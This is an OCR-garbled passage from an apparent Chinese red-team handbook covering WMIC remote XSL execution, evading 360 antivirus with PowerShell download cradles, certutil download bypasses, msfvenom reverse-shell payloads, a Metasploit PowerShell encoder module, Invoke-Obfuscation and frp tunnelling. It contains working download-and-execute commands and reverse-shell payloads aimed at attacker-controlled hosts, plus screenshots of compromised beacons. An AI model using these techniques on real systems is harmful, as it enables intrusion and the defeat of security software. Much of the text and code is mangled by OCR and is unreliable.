"&gt;&lt;CIM&gt;&1t; INSTANCE CLASSNAME-"Uin32. Proc gt;&1lt;PROPERTY NAME="Na 
UOTVPE-"string"&gt;&1lt;URLUE&gt;Sustem Idle Pro It; VALUERgt ;&it ; “PROPERTY 
gt ;&it ; “INSTANCE&gt ;&1t ; INSTANCE CLASSNAME=""Win32_Proc “Rgti&lt PROPERTY NAME 
"Nane" TYPE-"string"&gt;&lt;URLUE&gt; tem&lt ; /UALUE&gt ; &1t ; "PROPERTY&gt ; &1t ;/ 
STRNCE&gt;&It; INSTANCE CLASSNAME-'Win32 Process'&gt;&l1t;PROPERIY NAME-"Name" T 
PE="string"&gt ;&lt ;VALUERgt ;smss .exe&lt ; /UALUERgt ;&1t 5 7PROPERTY bgt ;&lt ; /INSTANC 
Bgt ;&1t; INSTANCE CLASSNAME="Win32_ Process"&gt;&lt;PROPERIV NAME=""Name" TYPE 
ing"&gt ;&1t ;UALUESgt ;cs -exe&lt ; UALUE&gt ;&1t ; “PROPERTY&gt ;&1t ;3 /INSTANG 
3; INSTANCE CLASSNAME="Vin32_Proc "Sgt ;&lt ;PROPERTY NAME-"Name" TYPE 
it;&lt SUALUERG -exe&lt ; /UALUE&gt 5 &1t ; “PROPERTY&gt 5 &1lt ; /INSTANCE&gt 5 &1t 5 INS 
NCE CLASSNAME-'"Uin32 Process"&gt;&1t;PROPERIY NAME-"Name'" TVPE-'string'&gt;&lt 
ALUE&gt ;wininit .exe&lt ; VALUE&gt 5 &1t ; 7PROPERTY&gt 5&1t 3 /INSTANCERgt 5 &1t ; INSTANC 





wmic process get name /format:"http://XXxx.XXX.XXX. XXX/Ail.xs1" // 这 里 的 forma 


| +B 


tomics\T122@\scre>wnic process get name /FORMAT:"http:/74 


?xml version-'"1.0" encoding-"UTF-16'75&1t;COMMAND SEQUENCENUM=""1" ISSUEDFROM-"T 
IANHE-SECEND” STARTTIM 11-87-2019115:00:09" EVERYCOUNT="0 
1t ;COMMANDLINE&gt; proc get name /FORMAT=:“http:7/47.98 .239 . 204\webdav Ail. xs 
1°"&1t;/COMMANDLINERgt 5&1t ;COMMANDLINECOMPONENITSR&gt ;&lt;NODELIST&gt;&lt;NODE&gt;T 
IANHE~SECEND&1t ; /NODE&gt ; &1t ; /NODELIST&gt ; &1t ;/COMMANDLINECOMPONENTS&gt ; &1t ;CONT 
EXT &gt ;&1t ;NAMESPACE&gt ; root \c inv2&1t ; “NAMES PACE&gt ; &1t ; ROLERyt ; root \c Liklt ; 7ROL 
Ekg t ;&1t ; IMPLEVEL&gt ; IMPERSONATE&1t ; /IMPLEUEL&gt ; &1t ;AUTHLEVEL&gt ; PRT PRIVACY It 5 
AUTHLEVEL&gt ; &1t ; LOCALE&gt ;ms_804&1t ; /LOCALE&gt 5 &1t ; PRIUI LEGES&gt ; ENABLE&1t ; /PR 
IUILEGES&gt ; &1€ ; TRACE&gt ; OFF&1t ; TRACER gt 5 & lt ; RECORDS gt ;N/AK1t ; /RECORD&gt ;&1t ; IN 
ERACTIVE&gt 5 OFF&1t 5 “INTERACT IVE&gt 5&1t ; FAILFAST&gt 5 OFF&1t ; /PFAILFAST&gt 5 &1t 5 OUTP 
T&gt ;STDOUT&1t ; OUTPUT &gt 5 &1t ;APPEND&gt ;STDOUT& It ; /APPEND&gt ; &k1t ;USER&gt sN/ARLE 
+ /USER&gt ; &1t s AGGREGATE&gt ; ON&1t ; “AGGREGAT E&gt ; &1t ; “CONTEXT &gt ; &1lt 5 7REQUEST&gt ; & 
1t;RESULTS NODE-'TIANHE-SECEND''&gt ;&1t ;CIM&gt;&1t; INSTANCE CLASSNAME="Win32_Proc 
ess"&gt;&1t;PROPERTY NAME-'"Nane" TYP string"&gt;&lt;UARLUE&gt;Sustem Idle Proce 
s&1t ; /UALUE&gt 5 &1t ; /PROPERTY&gt 5&1t ; “INSTANCE&gt ;&1t; INSTANCE CLASSNAME= 

rocess "&gt ;&lt;PROPERTY NAME-"Nane" TVPE-"string"&gt;&lt ;URLUE&gt sSystemblt ; /UA 
UE&gt ;&lt;/PROPERIV&gt;&1t;/INSTRNCE&gt ;&1t ; INSTANCE CLASSNAME="Win32_Process "& 








数据 源 :进程 监视 ， 进 程 命令 行 参数 ， 网 络 的 进程 使 用 ，DLL 监 视 


MSXSL.EXE 
进程 特征 : (级 别 : 高 ) 


# 当 MSXSL .EXE 作为 父 ; 


ParentImage regex 


进程 创建 其 他 进程 时 视 为 可 疑 


'^.*msxslN.exe$' 
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aar 


A 


加 载 项 特征 : CR 


p o o * & * » 9 9 » » * >+ 
E 


RA nd System! cate exe 


IDIFATFCE-D796-50€ 3- 000001018 36CO1]. 


3j: E) 


#MSXSL . EXEM Mj script ,d11 时 视 为 可 疑 


Image regex ' 


WMIC.EXE 


| 加 载 项 特征 : (m 


‘= 


^.*msxslN.exe$' AND ImageLoaded contains 'jscript.dll' 


GS FLFCE- 07 96-506: $-0000-001918A38C01) 


Al: &) 


# 当 WMIC ,EXE 加 载 jscript ,d11 视 为 可 疑 


Image regex ' 


^.*wmicN.exe$' AND ImageLoaded contains 'jscript.dll' 


ApLETIFGE-UME- $053 Q006-OO ORC EDITA) 
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攻击 红 队 百 科 全 书 》 


ershell 








利用 360 正 则 不 严 执行 powershell 上 线 


0x01 前 言 


360 作 为 目前 国内 用 得 最 多 的 安全 软件 ， 在 强大 的 木马 库 、 病 毒 库 加 持 下 ， 通 常 免 亲 如 : 加 载 器 、 
shelicode 处 理 都 会 迅速 失效 。 如 果 通 过 360 正 则 的 缺陷 进行 绕 过 ， 将 会 比 处 理 shellcode 更 为 简便 。 


0x02 powershell fuzzing 


powershell 无 文件 利用 自 blackhat 演 讲 至 今 已 经 过 去 近 5 年 ， 将 来 的 日 子 会 越 来 越 不 好 过 ，windows 
的 审计 会 越 来 越 细 ， 以 后 将 是 .NET 的 天 下 。 从 CS 推荐 使 用 .NET 内 存 加 载 开始 就 已 经 慢 慢 变 成 红 队 
的 主流 (execute-assembly)。 


生成 powershell web delivery 


powershell.exe -nop -w hidden -c 





1)fuzz 人 参数 


fuzz 思 路 ， 逐 一 去 掉 参 数 ， 查 看 360 过 滤 的 参数 是 哪些 ， 然 后 再 考虑 bypass 


去 除 IP，fail 
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hell.exe -nop -w hidden -c "TEX (inew-cb 


exe mnop — hidden [cT - 
loads tráng htt pi//192. 168.09. 128 :80/2q" ? 


denied 
soutraindpoucrahe Il exe mnop —w hidden ~o, M €t. net wehbe Vie 


nloads tring!” 


POW io Suet. 


saei < 





去 除 -c，fail 


RI Administrator: CAWindows\systemd2\cmd.exe - powershellexe -nop -w hidden -c 







rain?pou i TEX neu-object net .webe Iiei 
st) dom loadst rings’ https 
is denied. 


tNlsers \rootrain pow nop >v hidden -c “IEX Cnev-object net we 
at) down Loads ering ">" 


access is denied 


u rootrain2pouershell.éxe "nop “w hidden «c 





S | Œ 


AL, EL Rise Stat 
er 


ZR | 











mma cl 


去 除 -w，success 


BS Adminstrator CNWindo， em32 cmd exe - powershell.exe -nop E 





s denied. 


hell.exe -nop -y hidden ~c 


l.exe -nop ~w 


ell.exe -nop | 


oft Corporation. ALL rig 





Mts SAA Rew at Aare ths 


tenik 


um o um 


去 掉 -w hidden#ist, success 
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heli.exe nog. -u hidden >c 


»not process the connand e tyle teqwires an argument that is onel 
of Normal, Hidden, Minini ed.sSpecify one of these argument. vali 
and try again. 


Neaotrain?puuershell.exe nop 
ndowe Powe rShe 11 
Copyright 2009 Microsoft Corporation. AI 





train? crud AE 
ücrosoft Windows {Version 6.1.2680] : 
Copyright €c) 2009 fMicrocoft Corporation. AL) r ë [* 


train hell.exe mnop e “TER new-object net .webc Lien 
192.168,.29.12810A/pa! 99" 












| 

-- —] 

al pi : 
loaner i 


2S 


ER 





H 





EDER 





kia ^" "e 


-Ww hidden 只 是 将 窗口 样式 改 成 隐藏 ， 不 影响 执行 ， 用 webshell 或 者 wmic 执 行 都 可 以 


payload 








powershell.exe -nop -c 





2)bypass 参 数 


尝试 填充 字符 


Siisera eootrain?povershell.exe -Üersion (C£FFEFECECEFEEEFEFEEECFFEFFEFTEFCEFET 
WEECFEFEEFEEFECEFEFCEELCEEECFECCEEECEECECCLEKCECECECEECCEC CEU ECEE CEP ETE PEE PETT] 
E CFEECEFEEFELEFFFEC EFFECT CEL ECERLEEL CERF EF ECCE EE CPER SEER CER LESEESLELESELEFEL LEE, 
PEL FEEREE FECLELCE REECE CELE LE CER SEL ECS ESOS TPES ELE EE SELLS PEEL ELEC LEP EELLEPELELE 
WECFFEEFEFEE FIF FF FEE K Tf -nop ^w hidden ~o “1EX <(Cnew-object net. webclient).davnioa 
dst wing’? httpt//192.168 4 





以 -Version 作 为 lag， 看 是 否 能 正常 执行 


俐 不 是 version 人 参数 
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fh 














Il Administrator: CAWindows\systemd2\cmd.exe 





PCE FEREE ECER EE ESLER CLES EERE CUE ELE EEE FREESE ELSE LER E CEE ELE SEE ESSE SECS EE reerere 
IFEEEFFEFEECFEECEFFTFFEEFEEFFTCEFFEFEFEFFECFFEFFEEETEFEFFTETEEFTEFEFETFEFEFEEERT 
i FEES E REE CE PELE ELT EF uIuiusiui9imiuiiiii im 
mnn uus EET, 
muB UII m 
———— EERE CEEL CESS REEL EF ER LER CEFF REEF ELS ECEE EL tener tn rr 
Ke ELEELESE ELS ELES CEE F CLEP ELS LIS ELEE EPPS ELE EELES CLESCEEEESERESEE ESS ELE ECR EE RESELL 
ic PEEPS EELS ELLE ELLE REE ELS PERSE EEF ECLE CLES ELELEL PERLE EES EERESEL ESE ter 
TINI nm 
PEELE SEESELE PERLE E EEF ELEF ELFERL SPELL E LES ELES ELS ELLE EL PEF EELELSSELLE FEL EERE SERSS| 
E CEFEEEEFEEFEECFEFEFEEEEEEEEEFFEEFEEEEEE EFE tetera 
FESR ELE ERE ERS SELLE LES PELE E LES EES EL ES ELLER ELSE EES £ EEF EES PEELE LESERES £ etre 
FEFFEEECEECCEEFFEFEFEECE FECE EECEEFTE PES ERLE EL ES EELS ELLE EEEEECEFEFFEFTEE ETE FEL ERS 
PFEFFER EEE ELS ELLER LE ELE EELS ELSE CEE ES PERE LES LEE EEFFEFTEFECEEECEECEEECEEEE EFFET 
Je ELEF PRES REE ELEC CEP ELLE CLE ELE S CLS ELLFELLEEELS ELSE ter teeter hidden =e “LEX < 
knew-ohject net.veholient? down loadstring( http:/7192 168 .29.128:88/aq* >> 

D MEDUITIIIIMIInIIDIDIIIT 
CEE LEG ELESELOF ELL EE LERLEEE ELSE LEE ELLER LEP LL EELS ELL EEL EPERSERLS ELLE ELES ELL S PELE 
Immun; 
IF CER EREELEEEESSS LLLP LE FEC ER EC SELLS EFEL FLEES EF Ht" is not a valid Wi 
ndows PowerShell v r y a valid Windows PowerShell version of the for| 


:se oot rain? 





去 掉 -Version， 非 法 参数 


WIS Administrator: C\Windows 





2: sere vootrainy 





THIMMIMIMuISIumumHunununmunmmmumnnmnmumEumTM - 








-w 不 能 用 ff 作为 间隔 符 
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| 可 Select Adminiat C:\Windows 





PESPEESPELFERERPERS ERR SESS EELEFEES ELSE RES CEPEE PRES EERE ES SEFEF PRE REES PELER ESE O EES 


FPR EERFFEPERECEECEEESERERL EE CEE FERC ECE CSET LEST PERSE SE EPESPREERERRPES ERP EEPESER 


ELE REEEFETEFEEFFFFFEEEFETEFEFFFEEFFEEFFCCFECFFEEFFFEEFEFFFETFEFEFFEEFFCTTECFTER 
HP EFFRESERCEE LEE CER ECE FECEEE EEE ener EL ES ETS ESSE LES PERTH LES ELEPELEPERSPESEEESS EES 
FEEFEFFFEEFFEEFFEEETEEFEEFFEFEFFEFFFEEFFFEFEFEERFECEEKEEFTFEFEFEEEECEFECECECERRG 
EEFEFCEFEEEEEEEEFFECFEEFFEEEFFEFEFEEFEEFCEEECEFEFFEFFEEFTEFCFEFEFEFEEEEETEEFFFFEF 
EECCCCCCCECCCECEECCECECECEFCEE EEFCEPECE ses tee 

PreK ELLE ELSES CEEFLRSERESE LSS FERS te EES ERFELLSS ESSERE SERS ERE CE ELEERESEEES 
KEFEEEEFECEFECFEEEFE ECCEEETECEFEEECEEEEEEEFECTFECEEELCEECEF EFE EET E EF EE EL hiddon| 
MLEX <énew~ohJject wet .vebc linnt y. downloads tringt httpt//192.168.29.128 :88/aq 


























| Hil Administrator: CAWindows\systemiiemd.oe 





C: Wsers Nrootrain?pouershell.exe “nop -u 


hidden < "LEX €(new-ohject net wehbe Tie 
.128:88/aq'25" 





otrain 





sites 





X | Credentials X | Targets % | Lis 


T "um M Administrator *@192.168.29.129 (WIN-UIUC 3679923) 
02/17 15:58:58 7 » Administrator *6/19,168.29.129 (WIN-UIUC3619913) 
02/17 16:32:40 Deaton rootrain *@192.168.29.132 (WIN-IDOKUSFGUOQ 
907/17 16:44:22 veacon leom rootrain *@392.168.29.132 (WIN-IDOKUBFGUOD 
97/11 16:45 i » from, rootrain *@192.168.29.132 WINIDOKUBFEU0D 
07/12 TOG it kyti beacon fom rootrain *@192, 168.29.132 (WIN-IDOKUBF6UDD 
7/17 170416 ti Administrator *@292.168.29.129 (WIN-URUC361 9913 
Administrator *@192.168.29.129 (WIN-UIUC3619913) 
02/2 12042 beacon SYSTEM, *@192.168.29.132 (WIN-IDOKUBF6UOT) 
3/11 1604:21 17 niet bea * SYSTEM *@792.268.29.132 (WIN-IDOKUBF 6UUD) 
97/17 11:05:18 2.168.29.132 (WIN-IDOKUBF SUON 
07/17 17:5813 : 192.168.29.132 (WIN-IDOKUBF SUO) 
07/17 18:05:35. al beacon rootrain *&192:168.29.132 (WIN-IDOKUBF6UOD 
07/17 16:05:50 "n «on rootrain *(9192.168.29.132 (WIN-IDOKUBF 6UOI) 
07/17 18:1 E 15 toottain *@192.168.29.132 (WIN-IDOKUGFSUOD. 


07/171):0418 


payload 








dounloadstringC! http: 7/192. 168.29 
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powershell.exe -nop -w 


4 


3) 字 符 拼 接 


在 前 面 fuzz 参 数 的 时 候 得 知 空格 可 以 作为 分 隔 符 ， 绕 开 360 的 检测 长 度 。 然 后 就 想 是 否 可 以 通过 其 他 
字符 代替 空格 。 

fri f-Q4$90^&*( +<>?: 人 之后， 发 现 换行 符 ^ 与 占 位 符 " 可 用 ， 填 充 之 后 不 会 报错 。 但 是 由 于 ^ 
用 得 太 多 ，360 拦 截 太 狠 ， 而 且 换 行 符 不 能 连续 出 现 ， 导 致 它 凑 不 够 489 个 安全 距离 字符 : 只 能 
p^o^w^ePr....... X FÉ, 

剩 下 还 有 双 引 号 ， 在 命令 行 下 的 双 引 号 一 般 当 做 一 个 占 位 的 作用 ， 避 免 windows 在 识别 路 径 的 时 候 
因为 出 现 空 格 而 被 分 隔 (C:\Program Files). 


在 命令 任意 位 置 填充 均 可 。powershell 中 参数 之 间 无 法 使 用 ， 会 将 双 引 号 当做 参数 处 理 ， 只 能 处 理 
powershell.exe 





payload 


Hower ! im mmno acing 


0x03 小 彩蛋 
360 对 certutil 的 缺陷 处 理 
直接 下 载 文 件 会 拦截 
先 执行 certutil 


再 执行 certutil -urlcache -f -split 
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就 可 以 绕 过 拦截 
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关于 Powershell 对 抗 安全 软件 
关于 Powershell 对 抗 安全 软件 


知识 点 介绍 : 


e Windows PowerShell 是 以 .NET Framework 技 术 为 基础 ， 并 且 与 现 有 的 WSH 保 持 向 后 兼容 ， 
此 它 的 脚本 程序 不 仅 能 访问 .NET CLR， 也 能 使 用 现 有 的 COM 技 术 。 同 时 也 包含 了 数 种 系统 管 
理工 具 、 简 易 且 一 致 的 语法 ， 提 升 管理 者 处 理 ， 常 见 如 登录 数据 库 、WMI。Exchange Server 
2007 以 及 System Center Operations Manager 2007 等 服务 器 软件 都 将 内 置 Windows 
PowerShell。 


e Windows PowerShell 的 强大 ， 并 且 内 置 ， 在 渗透 过 程 中 ， ea 导 更 加 有 趣 。 而 安全 软件 
的 对 抗 查 杀 也 逐渐 开始 针对 powershell 的 一 切 行为 。 在 hitps:Wiechnet micros n 看 到 文档 
如 下 : 
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Here is a listing of the available startup parameters: 


-Command Specifies the command text to execute as though it were typed at the Pc 


-EncodedCommand Specifies the base64-encoded command text to execute. 


-ExecutionPolicy Sets the default execution policy for the console session. 


-File Sets the name of a script fi le to execute. 


-InputFormat Sets the format for data sent to PowerShell as either text string c 


-NoExit Does not exit after running startup commands. This parameter is useful v 


-NoLogo Starts the PowerShell console without displaying the copyright banner. 


-Noninteractive Starts the PowerShell console in non-interactive mode. In this m 


-NoProfile Tells the PowerShell console not to load the current user's profile. 


-QutputFormat Sets the format for output as either text string or serialized XML 


-PSConsoleFile Loads the specified Windows PowerShell console file. Console file 
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-Sta Starts PowerShell in single-threaded mode. 


-Version Sets the version of Windows PowerShell to use for compatibility, such e 


-WindowStyle Sets the window style as Normal, Minimized, Maximized, or Hidden. T 


针对 它 的 特性 ， 本 地 测试 : 


Add-Type -AssemblyName PresentationFramework; 


[System.wWindows.MessageBox]::Show( 'Micropoor') 


semblyName PresentationFramework;[ em. windows .M 


M 1cropoor 





上 文 所 说 ， 越 来 越 多 的 杀 软 开始 对 抗 ，powershell 的 部 分 行为 ， 或 者 特征 。 以 msfvenom 为 例 ， 生 成 
payload。 


kalig mstvenom -p windows /x64/meterpreter/rever cp LHOST=192.168.1.177 LPORT=8080 -f psh-reflection >micropoor.psl 
atform was selected, choosing Msf: : Modul latform: :Windows from the payload 
ch selected, selecting Arch: x64 from the payload 

0 encoder or badch ecified, outputting raw payload 





micropoor.ps1 不 幸 被 杀 。 
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无 需 执 行 任何 操作 。 





diei 


针对 powershell 特 性 ， 更 改 payload 


micropoor2.ps1 


http://192.168.1.117/micropoor2.ps1 


a 
micropoor.ps1 
a — http//192168.1.117/micropoor.ps1 


已 完成 4 个 项 目的 扫描 。 
本 次 扫描 过 程 中 ， 在 你 的 电脑 上 未 检 贡 用 | 任何 威胁 。 
你 的 电脑 正 被 监视 并 受到 保护 。 





f, 实时 保护 : 开 
人 ”病毒 和 间谍 软件 定 X: ”最 新 


接 下 来 考虑 的 事情 是 如 何 把 以 上 重复 的 工作 变 成 自动 化 ， 并 且 针 对 powershell，DownloadString 特 
性 ， 设 计 出 2 种 payload 形 式 : 


(1) 目标 机 出 网 
(2) 目标 机 不 出 网 
并 且 根 据 需求 ， 无 缝 连接 Metasploit。 
根据 微软 文档 ， 可 以 找到 可 能 对 以 上 有 帮助 的 属性 ， 分 别 为 : 
1. WindowStyle 
1. NoExit 
1. EncodedCommand 


1. exec 


。 自动 化 实现 如 下 : 


938 


# copy base64.rb to metasploit-framework/embedded/framework/modules/encode 


# Eg 

# msf encoder(powershell/base64) > use exploit/multi/handler 

# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse 
# payload => windows/x64/meterpreter/reverse_tcp 

# msf exploit(multi/handler) > exploit 

# msfvenom -p windows/x64/meterpreter/reverse tcp LHOST=xx.xx.xx.xx LPORT= 
# [*] Started reverse TCP handler on xx.1xx.xx.XX:XX 


class MetasploitModule « Msf::Encoder 


Rank - NormalRanking 


def initialize 


super( 
'Name' -» 'Powershell Base64 Encoder', 
'Description' => %q{ 


msfvenom -p windows/x64/meterpreter/reverse tcp LHOST=xx.xx.xx.xx LPORT- 


) 

'Author' -» 'Micropoor', 
'Arch' -» ARCH CMD, 
'Platform' => 'win') 
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register options([ | ? 
OptBool.new('payload', [ false, 'Use payload ', false ]), 
OptBool.new('x64', [ false, 'Use syswow64 powershell', false ]) 


}) 


end 


def encode_block(state, buf) 
base64 = Rex: :Text.encode_base64(Rex: : Text. to_unicode(buf) ) 
cmd = '' 
if datastore['x64'] 
cmd += 'c:WindowsSyswOW64WindowsPowerShellv1.Qpowershell.exe ' 
else 
cmd += 'powershell.exe ' 
end 
if datastore['payload'] 
cmd += '-windowstyle hidden -exec bypass -NoExit ' 
end 
cmd += "-EncodedCommand #{base64}" 


end 


end 


# if use caidao 
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# execute echo powershell -windowstyle hidden -exec bypass -c ""IEX (New-Object 


4 xxx.psi is msfvenom -p windows/x64/meterpreter/reverse tcp LHOST-XX.XX.XX.XX L 


copy powershell base64.rb to metasploit-framework/embedded/framework/modules/enc 


参数 payload 选择 是 否 使 用 Metasploit payload, RAHpowershellH XH. 


例 1 (目标 出 网 ， 下 载 执行 ) : 


echo powershell -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebCli 


Cdyect Net anon -e powershelt arch x64 =-platform Windows 


| 192.168.121.117: 8 
to 192.168.1.10 
168.1.117:808 .168.1.100;56473) at 


ajfvenoR =p vindows/ retet/reverse tep LHOST= 3 f psh-refiect bra windows payload 
g to read p t N 
tputting raw payload 


2763 bytes 
at 
O (iteratione 
744C 


exec byp 
Ep AGUA ho 


nA BSP AFT A 
In 


me. C 
FOAOGABAFO AZOBY A 





it: 加 payload 人 参数 
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msfvenom -p windows/x64/meterpreter/reverse tcp LHOST=192.168.1.117 LPORT=8080 - 


更 多 有 趣 的 实验 : 
把 例 1 的 down 内 容 更 改 为 例 2， 并 且 去 掉 payload 参 数 。 来 减 小 payload 大 小 。 


更 改 Invoke-Mimikatz.ps1 等 。 


oO 


< 


deepscanNzhudongfangyu e. 


Hoog 


Dero 


IO“ O00 


y 


oc 


kx 


an 


Window 


Ooa 


@ 


© 


ystem32\taskhost.exe 
\system32\cs 

ystem32\Dwm 

xplorer. EXE. 


runonce 
kxetray 
.ex 


INNB 83. OO F3 


86) \kingsoft\kingsoft ant 
jdkl., 7,0 _75\bin\java.exe 


antivirus \ui 
Program File: 86) \kingsoft\kingsoft antivirus\un10n 
rogram Files (x86)\k oft\k antivirusNuniüns 
gram File king oft antiviru 
SimpleIME.exe AppData\Local \Temp\2\SimpleIMe. exe 
kxetray.exe C: \Progre 1 86) g ngsoft antivirus\kxetr 
softwarehelper.exe. x8 Program Files (x86) 


NNNYN NNN 


66840 556 t „ey Wi ows 3 l „ex 
70124 0 X ndows\system32\notepad ETT 
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Invoke-Obfuscation 介 绍 


项 目地 址 :i 


该 项 目 混淆 技术 来 隐藏 powershell.exe 命 令 行 参数 中 的 大 部 分 命令 。 


( '36(78055032t61 91(990104X97 (114091-32t93)32t93) 32t340110m1110105]115X115-101m114. 1120120069-45 {101@107x111m118mll 

7 30124032X41957@51-93Q114_97_104t67t91{44V39Q112_81t109@393101 {99097 }108{112}101}82_45m32_32x52{51093m114@97-104 {67t9 

4¢39V98t103V48t 39-101 }99}97V108}112t101_82_45{32G41x39{41_112t81_109_ 39m43{39-110t101@112{81t39x43G39t109_ 43112 8191 

£101X39Q4 3m39}114Q7 1_112 {81m109m39@4 3x39V32040} 32m39_43_39{114-111m108t111t67 {100m110{117Q39_43m39-111-114Q103_101t114 

39{411t70-45}32m41} 98 {103V48V110098t103 {48039 {43 {39-43 {32t98m103_48{111@105t98@103V48-39G4 3139. 32-32V4 3v32}32t98t 

7V99t98X103t48_39V4 3m39G4 3 -39x4 3039_98@103@48}115V117V102098V7 9m4 5098m3904 3 {39X103_39x4 3039V48}.43-39}4 3+ 39}9) 

?Q39t4 3xX39_111x118x110V39x4 3} 39t98_103{48@4 3}32_98{103}48{73{98-39@4 3439m103_39}43{39{48Q32t39x43x39-32{4 

3V39m98X103 {39_43V39{48-116 {115Q79{39_43_39}98}103m48{39Q4 3t39x32x43{32_98@103-3904 3m39x48_72~39_43t39V45m39 

Q 904 3V39V32t39V4 3} 39m4 3Q32V98X3904 3__390103_48V39G4 3Q39@116x7 3t82V119m98-39{43_39}103048x40_46_ 32) 

40{34t59m91@65V114V114@97_121}93958Q58V829Q10191189101 {114 }115_101m40_36_78m55@32t41t32-59{32373{69V88m32{40t36Vv73) 
5074m1110105-110m32X39v39-32]41'.SpLiT( *'{_Q-@t}mxv’ ) [ForEach-Object { ([Int]$. -AS [Char]) } ) -2oin''.) 


"I" <"nvoke"+"-Obfus"+"cat" 


rite-Host "Invoke-Obfuscation" -ForegroundColor Green 
| 


| 


Invoke-Obfuscation 





支持 的 加 密 功能 列表 


hoose one of the below options: 


TOKEN Obfuscate PowerShell command Tokens 
AST Obfuscate PowerShell Ast nodes 


STRING Obfuscate entire command as a String 

ENCODING Obfuscate entire command via Encoding 

COMPRESS Convert entire command to one-liner and Compress 

LAUNCHER Obfuscate command args w/Launcher techniques (run once at end) 





TOKEN 支 持 分 部 分 混 浠 ，STRING 整 条 命令 混淆 ，COMPRESS 将 命令 转 为 单行 并 压缩 ， 
ENCODING 编 码 ，LAUNCHER 选 择 执 行 方式 。 


使 用 


* Set scriptblock / scriptpath 
指定 要 混淆 的 代码 块 或 者 脚本 路 径 
* undo 
取消 上 一 次 混淆 


* back 
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* out "path" 
混淆 结果 输出 到 文本 
e token 


对 字符 进行 混淆 


xecuted: 
CLI: Token StringNi | 
FULL: Out-ObfuscatedTokenCommand. -ScriptBlock 


j 2 i 
CiChar 189 +i Cha 


CLI: -Token\Command\t 
FULL: Out-ObfuscatedTokenCommand -ScriptBlock 


Executed: 
CLI: TokenMirgument 1 
FULL: Out-ObfuscatedTokenCommand -ScriptBlock $ 


“nop -w HIDdEn -c “TEX <<new-ob 
ALAD D A 


使 用 ALL 混淆 


xecuted: 
CLI: Token\Alint 
FULL: Out-ObfuscatedTokenCommand —ScriptBlock 


esult: 
CCC 
CCC'6132 
epe 


+ 


A nan ORR A eee hi Oe Mae A 
182+ (cHARIZ4+(cHARIL15 >. [cHARI39> 


* STRING 
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*Command’ 1 


’ CommandArgument ’ 


1 








Executed: 
CLI: String 
FULL: Out-ObfuscatedStringCommand -ScriptBlock $ScriptBlock 


Result: 


+ erhellt]? +* exe’ +’ -nop! 
j'** BEN n'*'et.'*'uebcli't'en' t t) 
人 
[cHAR1885; IcHaR139 —PEPlücecCIcHaRl168 *[cHaR169 *IcHaR1 





e Encoding 


支持 base64、hex 等 编码 


n> encoding 


Choose one of the below Encoding options to APPLY to current payload: 


ENCODING*1 Encode entire command as ASCII 

ENCODING^2 Encode entire command as Hex 

ENCODING^3 Encode entire command as Octal 

ENCODING\4 Encode entire command as Binary 

ENCODINGSS Encrypt entire command as SecureString CAES?) 
ENCODING*6 Encode entire command as BKOR 

ENCODINGN? Encode entire command as Special Characters 
ENCODING\S Encode entire command as Whitespace 


Executed: 
CLI: Enceding\t 
FULL: Out-EncodedfsciiCommand -ScriptBlock $ScriptBlock —PassThru 


.J1*'x!-d 
32K45F11 1111012027 


| 103 PA0839 TÍO4K116 111651121585 47; 
3 734’ -SPLIT °; -spLil 'I'-SPLit'H'- 
~spLit’&? ~sPLiT *?€* -SpLIF ?K iz < <LinT] 





* COMPRESS 
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cation Compress >: 1 


Compress ‘i 
FULL: Out-CompressedCommand -ScriptBlock $ScriptBlock -PassThru 





* LAUNCHER 


finvuoke-Obfuscation> LAUNCHER 


hoose one of the below Launcher options: 


LAUNCHER\PS PowerShell 

LAUNCHER\CMD Cmd + PowerShell 

LAUNCHER \WMIC Wmic + PowerShell 

LAUNCHER\RUNDLL Rund1132 + PowerShell 

LAUNCHERNUAR+ Cmd + set Var && PowerShell iex Var 
LAUNCHERSSTDIN+ Cmd Echo i PowerShell 一 《stdiny》 
LAUNCHERSCLIP+ Cnd Echo i Clip && PowerShell iex clipboard 
LAUNCHER WAR++ Cmd set Var && Cmd && PowerShell iex Var 
LAUNCHERNSTDIN++ Cmd set Var && Cmd Echo i PowerShell - (stdin? 
LAUNCHERNCLIP++ Cnd Echo i Clip && Cmd && PowerShell iex clipboard 
LRUNCHER 'NRUNDLL * * Cmd set Var && Rund1132 && PowerShell iex Var 
LAUNCHER\MSHTA++ Cnd set Uar && Mshta && PowerShell iex Var 


Executed: 
CLI: Launcher mic NL 
FULL: Out-PouerShellLauncher -ScriptBlock $ScriptBlock -NoExit 3 


sySTEM32\WBeMNimiC  "PRoce "CALL? 'CrEaTE' "poWERsHeLl 
-nop ES hidden ~c "\"IE 


r2 149 PR A 
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Downloader&Transfer 
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LCX 
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BAN 


— Ó 
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Powershell 


952 


7 


e 
uy 
o 





Shell 
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un 
wn 
o 





Frp 内 网 穿 透 实战 i 


wd, 


BY 


Tij 


实战 中 ， 当 通过 某 种 方式 拿 下 目标 机 器 权限 时 ， 发 现 该 机 器 可 出 网 。 此 时 为 了 内 网 横向 渗透 与 团队 
间 的 协同 作战 ， 可 以 利用 Frp 在 该 机 器 与 VPS 之 间 建 立 一 条 “专属 通道 "， 并 借助 这 条 通道 达到 内 网 穿 
透 的 效果 。 实 战 中 更 多 时 候 依靠 Socks5 。 


更 多 详细 使 用 方法 ， 可 查看 官方 Github， 这 里 不 再 鸥 述 。 


frps with public IP address 





tcp or http : : tcp or http 
service : : service 





前 期 准备 


先 准备 一 台 VPS 与 域名 。 


因 某 种 情况 会 更 换 VPS 地 址 ， 为 了 减少 更 改 frp 配 置 文件 的 次 数 ， 所 以 做 总 。 若 更 换 VPS， 
直接 编辑 域名 解析 地 址 即 可 。 


名 称 值 TTL 


frp 149. w 600 & 
$9 


anonysec@MacBook—ProX ~ ping frp.™@°m@™ online -c 1 
PING frp.“ om „Online (149, "ai" =): 56 data bytes 
64 bytes from 149. = " ; icmp seq-0 ttl-48 time-243.874 ms 


--—- frp m online ping statistics ——- 

1 packets transmitted, 1 packets received, 0.0% packet loss 
round-trip min/avg/max/stddev = 243.874/243.874/243.874/0.000 ms 
anonysec@MacBook—Prox 


下 载 地 址 


Frp 下 载 地 址 [ 跨 平台 ， 实 战 中 根据 目标 机 版 本 选择 下 载 ] 





https://github.c 


配置 文件 
ARS tis 


957 


[common] 


.addr = 0.0.0.0 


_port = 7007 


dashboard_port = 6609 


dashboard_user = AnonySec 


dashboard_owd = Admin@123 


og_file = ./frps.log 
log_level = info 


i|. max days = 3 


auth token - AdminQauth 
privilege mode = 
privilege token = Admin@privilege 


E iur ponte = 4000-50000 
heartbeat_timeout = 30 
